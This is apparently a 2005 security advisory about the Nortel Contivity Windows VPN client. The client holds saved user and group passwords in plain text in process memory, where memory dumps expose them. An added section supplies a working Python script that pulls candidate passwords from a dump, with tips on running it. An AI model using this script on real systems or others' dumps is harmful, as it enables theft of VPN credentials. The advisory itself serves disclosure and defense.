Nortel Windows VPN client password disclosure
NTA Monitor have discovered a password disclosure issue in the Nortel Windows VPN client: the client stores the VPN passwords in an obfuscated form in the Windows registry, but it also holds the unencrypted passwords in process memory. Both the user password and the group password (if group authentication is being used) are visible.
This issue occurs when either "Username and Password Authentication" or "Group Security Authentication" are used, and the user selects the "Save Password" option. The "Digital Certificate Authentication" method is not affected.
Overview
While performing a VPN test for a customer in October 2004, NTA Monitor discovered that the VPN client that was being used stored the VPN password (pre-shared key) unencrypted in the memory of the process "Extranet.exe". It was possible to recover the password by dumping the process memory to a file with PMDump, or by crashing the system to obtain a physical memory dump using a crash-on-demand utility such as Bang.
In the memory dump, the plain-text passwords appear near the associated user name or group name, which makes them easy to locate. It would be simple to write a tool to extract the user name, group name and associated passwords from a memory dump file.
The vulnerability allows anyone with access to the client system, or to a memory dump taken from it, to obtain the password. It may also allow anyone who has access to the obfuscated password in the client registry to use the VPN client to recover the corresponding plain-text password, although this has not been tested.
The issue was found in version 5.01 of the Windows Contivity VPN client, dated October 2004. It is suspected that earlier versions are also vulnerable, although this has not been tested. The Linux version of the Multi-OS client does not appear to be vulnerable, because it does not seem to allow the password to be saved. Presumably the Multi-OS clients for other operating systems (MacOS, HP-UX, etc.) are also not vulnerable.
Details
Below is a screenshot of the VPN client application, which is used to configure the VPN client. Part of the configuration is the user name and password. In this example, we use the user name "royhills@hotmail.com" and the password "Str0ng$Passw0rd", and we have selected the "Save Password" checkbox.
It is also possible to configure group authentication in addition to user authentication. In this example, we enable group authentication using the group name "VPN_Users" and the group password "Gr0up$Passw0rd".
The user password and group password are stored in the registry in an obfuscated format. Below is a screenshot showing the password registry entries: "Errors" is the user password, and "GroupErrors" is the group password. Presumably these non-obvious names were chosen for obscurity.
The VPN client process is "Extranet.exe", which is shown in the screenshot below.
PMDump can be used to copy the contents of the Extranet.exe process memory to a file, as the screenshot below shows. Alternatively, it is possible to crash the operating system to obtain a physical memory dump file, which will also contain the password.
The process memory dump file can then be viewed to discover the password. In this example, we use Microsoft Word 2000 to view the file. We can see the user name "royhills@hotmail.com", the group name "VPN_Users", the group password "Gr0up$Passw0rd", and the user password "Str0ng$Passw0rd". The names and passwords have been highlighted.
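The advisory notes that a tool to pull the names and passwords out of a dump would be simple to write. The script below is an added example (not NTA Monitor's code) of that idea: it searches a PMDump-style memory dump for a known user name or group name and reports the printable strings that sit within a fixed window around it, in both ASCII and UTF-16LE encodings, since the advisory only says the passwords are "near" the names and does not state the encoding or exact layout. The window size, minimum string length, and the embedded sample dump are assumptions constructed for the example; the user name, group name and passwords are the test values from the advisory.

```python
"""Extract candidate VPN passwords from a memory dump by locating known names.

Added example: scans a dump for a user or group name and lists nearby strings.
Layout assumptions (window size, encodings) are not taken from the advisory.
"""
import re
import sys
from pathlib import Path

MIN_LEN = 6    # assumption: ignore printable runs shorter than this
WINDOW = 256   # assumption: bytes searched on either side of a name

# Printable ASCII runs, and UTF-16LE runs (printable byte followed by NUL).
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def printable_strings(buf: bytes, base: int = 0) -> list[tuple[int, str]]:
    """Return (absolute_offset, text) for every ASCII or UTF-16LE run in buf."""
    found = []
    for m in ASCII_RE.finditer(buf):
        found.append((base + m.start(), m.group().decode("ascii")))
    for m in UTF16_RE.finditer(buf):
        found.append((base + m.start(), m.group().decode("utf-16-le")))
    return sorted(found)


def candidates_near(dump: bytes, name: str, window: int = WINDOW) -> list[tuple[int, str]]:
    """Find every occurrence of name (ASCII or UTF-16LE) and return the other
    printable strings located within `window` bytes of it."""
    results: list[tuple[int, str]] = []
    for needle in (name.encode("ascii"), name.encode("utf-16-le")):
        for m in re.finditer(re.escape(needle), dump):
            start = max(0, m.start() - window)
            region = dump[start:m.end() + window]
            for off, text in printable_strings(region, base=start):
                if text != name and (off, text) not in results:
                    results.append((off, text))
    return results


def extract_credentials(dump: bytes, names: list[str]) -> dict[str, list[str]]:
    """Map each known user/group name to the strings found near it."""
    return {name: [text for _, text in candidates_near(dump, name)] for name in names}


# Constructed sample dump: an ASCII user block and a UTF-16LE group block,
# separated by filler bytes. Not a real Extranet.exe dump.
SAMPLE_DUMP = (
    b"\x00" * 40
    + b"royhills@hotmail.com\x00" + b"\x00" * 8 + b"Str0ng$Passw0rd\x00"
    + b"\x90" * 300
    + "VPN_Users".encode("utf-16-le") + b"\x00\x00"
    + "Gr0up$Passw0rd".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 40
)


def main(argv: list[str]) -> int:
    if len(argv) < 3:
        print(f"usage: {argv[0]} DUMPFILE NAME [NAME ...]", file=sys.stderr)
        return 2
    dump = Path(argv[1]).read_bytes()
    for name in argv[2:]:
        for off, text in candidates_near(dump, name):
            print(f"{name}: 0x{off:08x} {text}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a PMDump output file with the user name and group name as arguments (both are readable from the client's saved profile, only the passwords are obfuscated). Everything printed is a candidate; the real password is the entry that sits closest to the name, so keep the window small and widen it only if nothing turns up.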
Here is the output from "Help -> About Contivity VPN Client" for the version that we used in our testing:
Further Information
This issue is one example of a VPN security flaw that NTA Monitor have discovered while performing VPN security testing. We have also published a white paper which discusses the general security issues that we have found to be associated with remote access IPsec VPNs. You can download a copy of this white paper from the following URL:
http://www.nta-monitor.com/posts/2005/01/vpn-flaws.html
This advisory was first released on 1st March 2005.